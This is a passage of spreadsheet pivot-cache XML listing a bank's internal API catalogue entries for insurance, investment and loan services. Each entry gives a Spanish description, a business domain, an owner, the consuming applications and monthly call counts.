    <s v="Seguros"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <n v="175"/>
    <n v="56"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-04-04T10:06:57"/>
    <s v="Insurance Pets"/>
    <n v="100"/>
    <s v="Insurance Pets - Issue"/>
    <n v="100"/>
    <s v="insurance-pets-issue"/>
    <s v="Api que genera la expedición de la póliza del seguro solicitado por el cliente La información que entrega:  -_x0009_ID correspondiente a la expedición de la póliza"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Seguros"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-04-04T10:06:57"/>
    <s v="Insurance Pets"/>
    <n v="100"/>
    <s v="Insurance Pets - Quote"/>
    <n v="100"/>
    <s v="insurance-pets-quote"/>
    <s v="Api que ayuda a generar una simulación del seguro solicitado por el cliente.  La información que entrega:  - nombre de la cobertura -fecha en que se efectíºa la cotización  - valor asegurado por cobertura - valor de la prima sin IVA - valor del IVA - total de la prima con IVA incluido"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Seguros"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <n v="348"/>
    <n v="108"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-09-02T22:15:53"/>
    <s v="Insurance Underwriting"/>
    <n v="110"/>
    <s v="Insurance Underwriting - Cash Withdrawals"/>
    <n v="110"/>
    <s v="insurance-underwriting-cash-withdrawals"/>
    <s v="API que permite asegurar un retiro de dinero en cajeros como el electrónico, adicionalmente, permite conocer la información de los retiros que han sido asegurados."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Seguros"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="SeguroDeRetiroEnCajero/V1.0"/>
    <m/>
    <s v="AsegurarRetiro_AW1151001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MascaraTransaccional_NU0021001"/>
    <n v="12158107"/>
    <n v="11019709"/>
    <n v="10110539"/>
    <n v="10245697"/>
    <n v="11407036"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-09-25T11:45:59"/>
    <s v="Underwriting"/>
    <n v="101"/>
    <s v="Insurance Vehicle"/>
    <n v="101"/>
    <s v="insurance-vehicle"/>
    <s v="Esta API tiene capacidades asociadas a la administración de los seguros vehiculares con el corredor de seguro Willis."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <s v=""/>
    <m/>
    <s v="APM_AW1097001"/>
    <n v="2246"/>
    <n v="1721"/>
    <n v="1861"/>
    <n v="1804"/>
    <n v="2007"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-04-06T02:23:46"/>
    <s v="Underwriting Sufi"/>
    <n v="100"/>
    <s v="Insurance Vehicle"/>
    <n v="100"/>
    <s v="insurance-vehicle"/>
    <s v="Esta API tiene capacidades asociadas a la administración de los seguros vehiculares de Sufi."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="WllsWeb_AW1385001"/>
    <n v="2246"/>
    <n v="1721"/>
    <n v="1861"/>
    <n v="1804"/>
    <n v="2007"/>
    <x v="4"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-09-07T19:15:47"/>
    <s v="Underwriting Sufi"/>
    <n v="201"/>
    <s v="Insurance Vehicle"/>
    <n v="201"/>
    <s v="insurance-vehicle"/>
    <s v="Esta API tiene capacidades asociadas a la administración de los seguros vehiculares de Sufi."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="WllsWeb_AW1385001 _x000d__x000a_ MonitoreoDCM_AAA"/>
    <n v="2246"/>
    <n v="1721"/>
    <n v="1861"/>
    <n v="1804"/>
    <n v="2007"/>
    <x v="4"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-09-02T10:20:56"/>
    <s v="Interactive Help"/>
    <n v="101"/>
    <s v="Interactive Help - Frequently Asked Questions"/>
    <n v="101"/>
    <s v="interactive-help-frequently-asked-questions"/>
    <s v="El servicio de las preguntas frecuentes es un listado de preguntas y respuestas que los clientes hacen de manera recurrente, acerca de diferentes temas o inquietudes del negocio. A través de la API de preguntas frecuentes tenemos las capacidades de Obtener la respuesta de preguntas frecuentes y calificar y comentar una pregunta frecuente."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="Esteban Arroyave Montoya"/>
    <m/>
    <m/>
    <s v="Portal Contenidos Bancolombia_AW1218001"/>
    <n v="17617"/>
    <n v="12407"/>
    <n v="13862"/>
    <n v="12495"/>
    <n v="11688"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-08-27T17:31:07"/>
    <s v="Investment Account"/>
    <n v="122"/>
    <s v="Investment Account - Creation"/>
    <n v="102"/>
    <s v="investment-account-creation"/>
    <s v="La API permite a los consumidores crear cuentas multiproducto de inversión a un cliente en especí­fico en Valores Bancolombia."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Valores"/>
    <s v="Inversiones"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="AsesoriaAsistida_AW1208 _x000d__x000a_ Inversi_NU0160001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="121"/>
    <n v="124"/>
    <n v="58"/>
    <n v="54"/>
    <n v="58"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-01-13T18:07:28"/>
    <s v="Investment Account"/>
    <n v="122"/>
    <s v="Investment Account - Information"/>
    <n v="101"/>
    <s v="investment-account-information"/>
    <s v="La API permitirá a los consumidores consultar las cuentas de inversión asociadas a un cliente especí­fico en Valores Bancolombia."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Valores"/>
    <s v="Inversiones"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v=""/>
    <m/>
    <s v="AsesoriaAsistida_AW1208 _x000d__x000a_ Inversi_NU0160001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="6897"/>
    <n v="5840"/>
    <n v="4722"/>
    <n v="4591"/>
    <n v="4572"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-08-27T17:31:07"/>
    <s v="Investment Account"/>
    <n v="122"/>
    <s v="Investment Account - Management"/>
    <n v="102"/>
    <s v="investment-account-management"/>
    <s v="Permite realizar la gestión administrativa de las Cuentas de Inversión en Valores Bancolombia."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Valores"/>
    <s v="Inversiones"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="AsesoriaAsistida_AW1208 _x000d__x000a_ Inversi_NU0160001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-08-27T17:31:07"/>
    <s v="Investment Account"/>
    <n v="122"/>
    <s v="Investment Account - Transfer"/>
    <n v="103"/>
    <s v="investment-account-transfer"/>
    <s v="permite realizar transferencias desde y hacia Cuentas Multiproducto de Inversión de Valores Bancolombia."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Valores"/>
    <s v="Inversiones"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="AsesoriaAsistida_AW1208 _x000d__x000a_ Inversi_NU0160001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="1710"/>
    <n v="4274"/>
    <n v="2877"/>
    <n v="3191"/>
    <n v="2013"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-07-23T09:17:40"/>
    <s v="Investment Channel"/>
    <n v="100"/>
    <s v="Investment channel  - customer"/>
    <n v="100"/>
    <s v="investment-channel-customer"/>
    <s v="Esta API permitirá exponer las diferentes consultas relacionadas con la información de un cliente del canal de inversiones y de esta manera permitir la administración desde el Módulo Administrativo u otros consumidores.  Inicialmente, la API tendrá las siguientes capacidades: 1.Consultar los clientes registrados 2. Consulta de cuentas locales inscritas por el cliente en el canal. 3. Consulta de cuentas internacionales inscritas por el cliente en el canal."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Valores"/>
    <s v="Inversiones"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001"/>
    <m/>
    <n v="8"/>
    <n v="2"/>
    <n v="75"/>
    <n v="92"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-07-23T09:17:40"/>
    <s v="Investment Channel"/>
    <n v="100"/>
    <s v="Investment Channel - Management"/>
    <n v="100"/>
    <s v="investment-channel-management"/>
    <s v="Esta API permite exponer las capacidades para gestionar los clientes en los diferentes canales del banco"/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Valores"/>
    <s v="Inversiones"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-08-17T19:15:08"/>
    <s v="Investment Customer"/>
    <n v="111"/>
    <s v="Investment Customer Personal Data - Information"/>
    <n v="111"/>
    <s v="investment-customer-personal-data-information"/>
    <s v="Permite realizar la consulta de los datos personales de los clientes que tienen inversiones administradas por Valores Bancolombia"/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Valores"/>
    <s v="Inversiones"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="AsesoriaAsistida_AW1208 _x000d__x000a_ Inversi_NU0160001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="88076"/>
    <n v="160821"/>
    <n v="94299"/>
    <n v="86298"/>
    <n v="74860"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-08-26T19:44:43"/>
    <s v="Investment Notifications"/>
    <n v="102"/>
    <s v="Investment Notifications - Notifications"/>
    <n v="102"/>
    <s v="investment-notifications-notifications"/>
    <s v="Permite notificar a los clientes que tienen inversiones administradas por Valores Bancolombia a través de correo electrónico y SMS."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Valores"/>
    <s v="Inversiones"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="AsesoriaAsistida_AW1208 _x000d__x000a_ Inversi_NU0160001"/>
    <n v="2527"/>
    <n v="4084"/>
    <n v="2396"/>
    <n v="2598"/>
    <n v="3968"/>
    <x v="1"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-12-19T01:48:57"/>
    <s v="Investments Channel"/>
    <n v="100"/>
    <s v="Investments channel  - customer"/>
    <n v="100"/>
    <s v="investments-channel-customer"/>
    <s v="Esta API permitirá exponer las diferentes consultas relacionadas con la información de un cliente del canal de inversiones y de esta manera permitir la administración desde el Módulo Administrativo u otros consumidores.  Inicialmente, la API tendrá las siguientes capacidades: 1.Consultar los clientes registrados 2. Consulta de cuentas locales inscritas por el cliente en el canal. 3. Consulta de cuentas internacionales inscritas por el cliente en el canal."/>
    <s v="CANALES_Y_CONTENIDOS_DIGITALES_PYMES"/>
    <s v="Canales Pymes"/>
    <s v="Inversiones"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2021-01-04T09:35:21"/>
    <s v="Investments Channel"/>
    <n v="110"/>
    <s v="Investments channel  - customer"/>
    <n v="110"/>
    <s v="investments-channel-customer"/>
    <s v="Esta API permitirá exponer las diferentes consultas relacionadas con la información de un cliente del canal de inversiones y de esta manera permitir la administración desde el Módulo Administrativo u otros consumidores.  Inicialmente, la API tendrá las siguientes capacidades: 1.Consultar los clientes registrados 2. Consulta de cuentas locales inscritas por el cliente en el canal. 3. Consulta de cuentas internacionales inscritas por el cliente en el canal."/>
    <s v="CANALES_Y_CONTENIDOS_DIGITALES_PYMES"/>
    <s v="Canales Pymes"/>
    <s v="Inversiones"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="Modulo Administrativo Canales Digitales_AW1204"/>
    <n v="8"/>
    <n v="1"/>
    <n v="11"/>
    <n v="11"/>
    <n v="42"/>
    <x v="3"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Linea Unica"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v=" El servicio LineaUnica, representa la virtualización en el WebSphere Message Broker (WMB) de una funcionalidad que expone el aplicativo de Gestión de Cobranzas ADMINFO para la validación de información requerida por parte de terceros sobre el abogado (aliado estratégico o empresa de cobranza) asociado al crédito que posea un cliente en condición de dificultad crediticia."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <s v="Otras Funciones de Apoyo"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="Adminfo_Adminfo_AW0157001"/>
    <s v="Allus"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Listado Cuentas Depositos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Las cuentas de ahorro y corrientes son productos financieros de alta demanda por parte de los clientes y en ese sentido es necesario que el banco tenga la capacidad de acceder a la información de estas cuentas. El objetivo de este servicio es agrupar todas las capacidades de consulta de información NO monetaria de los productos de cuentas depósitos."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="Depositós"/>
    <s v="AW1177 _x000d__x000a_AW1203001 _x000d__x000a_AW1128"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-10-26T15:56:29"/>
    <s v="Loan"/>
    <n v="100"/>
    <s v="Loan - Balances"/>
    <n v="100"/>
    <s v="loan-balances"/>
    <s v="La API Loan Balances permitirá a los diferentes consumidores poder obtener los diferentes saldos de manera detallada para los tipos de productos LAA: Préstamo retail, CLA: Préstamo corporativo que se encuentren activos en las Filiales del exterior"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaSaldosCreditos/V1.0"/>
    <m/>
    <s v="TMP1 johucorr_AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-03-29T15:30:06"/>
    <s v="Loan"/>
    <n v="110"/>
    <s v="Loan - Disbursements"/>
    <n v="100"/>
    <s v="loan-disbursements"/>
    <s v="Esta API cuenta con capacidades que permiten la creación obligaciones crediticias y diversas formas de disponibilización de sus recursos."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y Consumo"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <m/>
    <m/>
    <s v="PROFIN_PRODUCTORCONSUMIDOR _x000d__x000a_ AW1313001_VTD_Rediferidos_Back _x000d__x000a_ BNPL_NU0287001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <n v="23"/>
    <n v="9"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-10-05T14:13:07"/>
    <s v="Loan"/>
    <n v="110"/>
    <s v="Loan - Loans"/>
    <n v="101"/>
    <s v="loan-loans"/>
    <s v="Esta API cuenta con capacidades que permiten la consulta de préstamos de un cliente así­ como de detalles de una obligación."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y Consumo"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <m/>
    <m/>
    <s v="PROFIN_PRODUCTORCONSUMIDOR _x000d__x000a_ AW1313001_VTD_Rediferidos_Back _x000d__x000a_ BNPL_NU0287001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-01-27T17:09:18"/>
    <s v="Loans Sufi Study Consume"/>
    <n v="201"/>
    <s v="Loan Additional Information"/>
    <n v="101"/>
    <s v="loan-additional-information"/>
    <s v="La API Loans Sufi study consume - Loan additional information tiene como objetivo ofrecer las capacidades de diligenciamiento y consulta de los datos complementarios necesarios para iniciar la fase de instrumentación en una solicitud de crédito de consumo de Sufi y así­ permitir el desembolso al aliado."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="VDSAUTOGESTIONCONSUMOBACK_NU0037003 _x000d__x000a_ VDSAUTOGESTIONCONSUMOBACK_NU0037003 _x000d__x000a_ MONSUFI_AW1191035 _x000d__x000a_ MovilidadCore_AW1281002"/>
    <n v="408"/>
    <n v="606"/>
    <n v="767"/>
    <n v="3512"/>
    <n v="125382"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-01-06T14:20:26"/>
    <s v="Loans Sufi Study Consume"/>
    <n v="100"/>
    <s v="Loan Application"/>
    <n v="100"/>
    <s v="loan-application"/>
    <s v="Esta API tiene capacidades relacionadas con la gestión de una solicitud de crédito de consumo, permitiendo iniciar el proceso de estudio de crédito, consultar el estado de todas la solicitudes y detalles de una solicitud que fue aprobada. Además, contiene una capacidad de consulta que le í­ndica al usuario si es posible efectué la radicación de la solicitud que se encuentra diligenciando."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="NU0037003_VDSAUTOGESTIONCONSUMOBACK _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MovilidadCore_AW1281002"/>
    <n v="310707"/>
    <n v="641937"/>
    <n v="166967"/>
    <n v="388546"/>
    <n v="259734"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-08-12T15:40:37"/>
    <s v="Loans Sufi Study Consume"/>
    <n v="201"/>
    <s v="Loan Application"/>
    <n v="200"/>
    <s v="loan-application"/>
    <s v="Esta API tiene capacidades relacionadas con la gestión de una solicitud de crédito de consumo, permitiendo iniciar el proceso de estudio de crédito, consultar el estado de todas la solicitudes y detalles de una solicitud que fue aprobada. Además, contiene una capacidad de consulta que le í­ndica al usuario si es posible efectué la radicación de la solicitud que se encuentra diligenciando. "/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="VDSAUTOGESTIONCONSUMOBACK_NU0037003 _x000d__x000a_ VDSAUTOGESTIONCONSUMOBACK_NU0037003 _x000d__x000a_ MONSUFI_AW1191035 _x000d__x000a_ MovilidadCore_AW1281002"/>
    <n v="310707"/>
    <n v="641937"/>
    <n v="166967"/>
    <n v="388546"/>
    <n v="259734"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-01-27T17:09:18"/>
    <s v="Loans Sufi Study Consume"/>
    <n v="100"/>
    <s v="Loan Application Information"/>
    <n v="100"/>
    <s v="loan-application-information"/>
    <s v="Esta API tiene capacidades que permiten la consulta y la creación de la información necesaria para la solicitud de un crédito de consumo en Sufi, con el propósito de su radicación posterior para que se efectué un estudio de crédito. Nota: Para la diligenciar este bloque de información se debe consumir los catalogos de referencia de sufi que entregan el dominio de valores de los campos que lo requieren. En la documentación de la operación (DO_addProductData_v1.0.0_.xlsx), en cada campo se especifica como se debe consultar dicho catálogo, de manera que se tenga para cada campo los datos de referencia que entiende el back de la API."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <s v=""/>
    <m/>
    <s v="NU0037003_VDSAUTOGESTIONCONSUMOBACK _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MovilidadCore_AW1281002"/>
    <n v="693129"/>
    <n v="577177"/>
    <n v="472980"/>
    <n v="551060"/>
    <n v="743811"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-08-12T15:40:37"/>
    <s v="Loans Sufi Study Consume"/>
    <n v="201"/>
    <s v="Loan application information"/>
    <n v="110"/>
    <s v="loan-application-information"/>
    <s v="Esta API tiene capacidades que permiten la consulta y la creación de la información necesaria para la solicitud de un crédito de consumo en Sufi, con el propósito de su radicación posterior para que se efectué un estudio de crédito. Nota: Para la diligenciar este bloque de información se debe consumir los catalogos de referencia de sufi que entregan el dominio de valores de los campos que lo requieren. En la documentación de la operación (DO_addProductData_v1.0.0_.xlsx), en cada campo se especifica como se debe consultar dicho catálogo, de manera que se tenga para cada campo los datos de referencia que entiende el back de la API."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <s v=""/>
    <m/>
    <s v="VDSAUTOGESTIONCONSUMOBACK_NU0037003 _x000d__x000a_ VDSAUTOGESTIONCONSUMOBACK_NU0037003 _x000d__x000a_ MONSUFI_AW1191035 _x000d__x000a_ MovilidadCore_AW1281002"/>
    <n v="693129"/>
    <n v="577177"/>
    <n v="472980"/>
    <n v="551060"/>
    <n v="743811"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-25T11:54:11"/>
    <s v="Document Service Sufi"/>
    <n v="100"/>
    <s v="Loan Documents Sufi"/>
    <n v="100"/>
    <s v="loan-documents-sufi"/>
    <s v="La API Document Service Sufi- loan documents provee capacidades relacionadas con la entrega y recuperación de documentos utilizados en el proceso de solicitud de credito y tambien posterior a esto"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="VDSAUTOGESTIONCONSUMOBACK_NU0037003 _x000d__x000a_ VDSAUTOGESTIONCONSUMOBACK_NU0037003 _x000d__x000a_ Monitoreo_AW1378001 _x000d__x000a_ MONSUFI_AW1378001"/>
    <n v="205"/>
    <n v="684"/>
    <n v="597"/>
    <n v="1285"/>
    <n v="2107"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-02-24T19:17:41"/>
    <s v="Loan Utilities"/>
    <n v="100"/>
    <s v="Loan Utilities - Installments"/>
    <n v="100"/>
    <s v="loan-utilities-installments"/>
    <s v="Esta API cuenta con capacidades que permiten el cálculo de cuota para créditos no desembolsados y de recálculo para créditos desembolsados."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y Consumo"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <s v="CalculoCuotaCredito/V1.0"/>
    <m/>
    <s v="MsUtilities_NU0102001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR"/>
    <n v="2"/>
    <n v="29"/>
    <m/>
    <n v="23"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-01-27T20:17:00"/>
    <s v="Loans"/>
    <n v="223"/>
    <s v="Loans - Agreements Enquiry"/>
    <n v="102"/>
    <s v="loans-agreements-enquiry"/>
    <s v="Esta API expone métodos que permiten la consulta datos básicos de convenios empresariales de cartera los cuales pueden ser de libranza, seguros, DAI, ONGs o fundaciones, etc"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y Consumo"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <s v="AdministracionConveniosCartera/V1.0"/>
    <m/>
    <s v="ALM_AW0955001 _x000d__x000a_ ALM_AW0955 _x000d__x000a_ Auditoria _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ LimitsCreditExhibition_NU0114001 _x000d__x000a_ APP_NU0114001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ BNPL_NU0287001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-05-06T22:39:54"/>
    <s v="Loans"/>
    <n v="223"/>
    <s v="Loans - Enquiry"/>
    <n v="222"/>
    <s v="loans-enquiry"/>
    <s v="Api que permite la consulta de los préstamos que tenga un cliente o un convenio empresarial, la consulta detallada y los movimientos de un préstamo en particular."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y Consumo"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <s v="ConsultaInformacionPrestamos/V2.0"/>
    <s v="STI - Sistema Transaccional de Integración_Sistema Transaccional de Integración_ISSTI0002"/>
    <s v="ALM_AW0955001 _x000d__x000a_ ALM_AW0955 _x000d__x000a_ Auditoria _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ LimitsCreditExhibition_NU0114001 _x000d__x000a_ APP_NU0114001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ BNPL_NU0287001"/>
    <n v="1695225"/>
    <n v="1455563"/>
    <n v="1467864"/>
    <n v="1312363"/>
    <n v="1617573"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-05-26T11:34:39"/>
    <s v="Loans"/>
    <n v="223"/>
    <s v="Loans - Loan Applications"/>
    <n v="100"/>
    <s v="loans-loan-applications"/>
    <s v="En su versión inicial, esta API expone capacidades que permiten consultar los detalles relacionados con solicitudes de crédito radicadas, así­ como actualizar el estado de éstas, haciendo posible, en parte, la gestión de este proceso previo al desembolso del crédito."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y Consumo"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <s v="SolicitudDeCredito/V1.0"/>
    <m/>
    <s v="ALM_AW0955001 _x000d__x000a_ ALM_AW0955 _x000d__x000a_ Auditoria _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ LimitsCreditExhibition_NU0114001 _x000d__x000a_ APP_NU0114001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ BNPL_NU0287001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-01-27T20:17:00"/>
    <s v="Loans"/>
    <n v="223"/>
    <s v="Loans - Maximum Loan Amount"/>
    <n v="111"/>
    <s v="loans-maximum-loan-amount"/>
    <s v="No tiene Descipcion"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y Consumo"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <s v="ConsultaDatosCartera/V2.0"/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
